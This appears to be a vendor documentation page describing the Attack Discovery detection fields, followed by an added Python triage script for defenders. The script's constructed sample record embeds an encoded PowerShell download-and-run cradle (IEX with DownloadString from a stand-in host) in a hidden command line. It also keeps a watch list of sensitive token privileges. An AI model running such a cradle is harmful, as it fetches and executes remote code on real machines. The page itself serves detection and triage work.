
Provides general information about the threats detected by Attack Discovery. Each detection carries only the fields that apply to the targeted object (for example, the registry fields are populated only for registry objects and the AMSI fields only for script content).

Table 1. Detailed Attack Discovery Detection Information

| Data | Description |
|------|-------------|
| Object Value | The name of the object targeted by the detected threat |
| Object Type | The type of object targeted by the detected threat (for example, file, process, or registry) |
| First Logged | The time when Attack Discovery first logged the detection |
| File Directory | The directory containing the object targeted by the detected threat |
| Process ID | The process ID (PID) of the process that triggered the detection |
| CLI Command | The command line of the process that triggered the detection |
| Signer | The signer of the certificate used to sign the object file |
| User Domain | The domain of the user account associated with the detection |
| User Name | The account name associated with the object |
| Impersonated User Name | The user name that the threat impersonated |
| Authentication ID | The locally unique identifier (LUID) assigned to the logon session |
| Integrity Level | The Windows integrity level assigned to the logon user, which determines the level of protection or access its processes receive |
| File SHA-1 | The SHA-1 hash value of the object file |
| File SHA-256 | The SHA-256 hash value of the object file |
| File MD5 | The MD5 hash value of the object file |
| Census Rating | The rating determined by Trend Micro threat experts based on the recorded history of the file |
| File Security Owner | The current owner of the file according to the file properties |
| File Security Owner Domain | The domain of the current owner of the file according to the file properties |
| File Security Previous Owner | The previous owner of the file according to the file properties |
| File Security Previous Owner Domain | The domain of the previous owner of the file according to the file properties |
| Registry Key | The registry key that the threat accessed |
| Registry Value Name | The name of the registry value that the threat accessed |
| Registry Value Data | The data of the registry value that the threat accessed |
| AMSI App Name | The name of the application or scripting engine that submitted the content to AMSI |
| AMSI App Full Path | The full path of the application associated with the threat |
| AMSI App Version | The version of the application associated with the threat |
| AMSI Script Source | The file name and extension of the script source |
| AMSI Script Content | The content of the script as submitted to AMSI |
| AMSI Script Source SHA-1 | The SHA-1 hash value of the script source |
| AMSI Script Source SHA-256 | The SHA-256 hash value of the script source |
| Source IP Address | The source IP address of the detected threat |
| Source IP Address Port | The source port number of the detected threat's network connection |
| Destination IP Address | The IP address that the threat accessed |
| Destination IP Address Port | The destination port number that the threat accessed |
| Destination URL | The URL that the threat accessed |
| Destination Domain | The domain name that the threat accessed |
| WMI Event | The WMI event information associated with the threat |
| Windows Event Source | The name of the software that logged the event, as recorded in the Windows Event Log |
| Windows Event Log Content | The Windows Event Log content that triggered the detection |
| Auth Priv Name | The name of the authorization (token) privilege that the threat modified, for example SeDebugPrivilege |
| Auth Priv Attribute | The attribute the threat applied to the authorization privilege (for example, enabled or removed) |
| Auth Priv Disable All | Whether the modification disabled all privileges on the token (the "disable all" option of the privilege adjustment) |
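The following Python script is an added example, not part of the Trend Micro documentation or product, showing how an analyst might consume these fields during triage: it verifies that a collected sample matches the File MD5/SHA-1/SHA-256 values in the detection, decodes a PowerShell `-EncodedCommand` found in CLI Command, and flags token impersonation and sensitive privilege changes from the Impersonated User Name and Auth Priv fields. It assumes the detection is available as a Python dict keyed by the Data names in Table 1 (the product's real export format is not described on this page), and the sample bytes, the record, and the privilege watch list are all constructed for illustration.

```python
"""Triage helper over Attack Discovery detection fields (added example)."""
import base64
import hashlib
import re

# Token privileges whose adjustment by an interactive user process deserves a
# closer look. This watch list is the example's own choice, not a product setting.
SENSITIVE_PRIVILEGES = {
    "SeDebugPrivilege", "SeTcbPrivilege", "SeLoadDriverPrivilege",
    "SeImpersonatePrivilege", "SeBackupPrivilege", "SeRestorePrivilege",
}

# PowerShell accepts -EncodedCommand and its unambiguous prefixes (-e, -ec, -enc).
_ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def file_hashes(data: bytes) -> dict:
    """Hash a sample with the three algorithms the detection record carries."""
    return {
        "File MD5": hashlib.md5(data).hexdigest(),
        "File SHA-1": hashlib.sha1(data).hexdigest(),
        "File SHA-256": hashlib.sha256(data).hexdigest(),
    }


def verify_sample(record: dict, data: bytes) -> dict:
    """Compare a retrieved sample against the hashes in the detection record.

    Returns {field: bool}; any False means the collected file is not the one
    the detection refers to, so re-collect it before analysing it."""
    actual = file_hashes(data)
    return {field: record.get(field, "").lower() == digest for field, digest in actual.items()}


def decode_encoded_command(cli_command: str):
    """Return the script behind a PowerShell -EncodedCommand argument, or None.

    PowerShell expects base64 of the UTF-16LE script text, so both the base64
    and the UTF-16LE step must succeed for the argument to count as encoded."""
    match = _ENCODED_RE.search(cli_command)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(record: dict) -> list:
    """Derive analyst-facing findings from the fields of one detection."""
    findings = []
    decoded = decode_encoded_command(record.get("CLI Command", ""))
    if decoded is not None:
        findings.append(f"encoded PowerShell command decodes to: {decoded}")
    if record.get("Impersonated User Name"):
        findings.append(
            f"{record.get('User Domain')}\\{record.get('User Name')} ran as "
            f"{record['Impersonated User Name']} (token impersonation)"
        )
    privilege = record.get("Auth Priv Name")
    if privilege in SENSITIVE_PRIVILEGES:
        findings.append(
            f"{privilege} adjusted ({record.get('Auth Priv Attribute')}) at "
            f"integrity level {record.get('Integrity Level')}"
        )
    return findings


# Constructed detection record: keys are the Data names from Table 1; the
# dict layout itself is an assumption, not the product's export format.
SAMPLE_BYTES = b"MZ\x90\x00" + b"constructed sample bytes, not a real binary " * 8
PLAIN_COMMAND = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
ENCODED_COMMAND = base64.b64encode(PLAIN_COMMAND.encode("utf-16-le")).decode()
SAMPLE_RECORD = {
    "Object Value": "powershell.exe",
    "Object Type": "Process",
    "File Directory": r"C:\Windows\System32\WindowsPowerShell\v1.0",
    "Process ID": 4120,
    "CLI Command": f"powershell.exe -NoP -W Hidden -EncodedCommand {ENCODED_COMMAND}",
    "User Domain": "CORP",
    "User Name": "jdoe",
    "Impersonated User Name": "",
    "Integrity Level": "High",
    "Auth Priv Name": "SeDebugPrivilege",
    "Auth Priv Attribute": "SE_PRIVILEGE_ENABLED",
    **file_hashes(SAMPLE_BYTES),
}

if __name__ == "__main__":
    print("hash check:", verify_sample(SAMPLE_RECORD, SAMPLE_BYTES))
    for finding in triage(SAMPLE_RECORD):
        print("-", finding)
```

The hash comparison is the important first step: a sample pulled from the File Directory path after the fact may already have been replaced or cleaned, and the three hashes in the record are what tie the analysis to the object the detection actually saw.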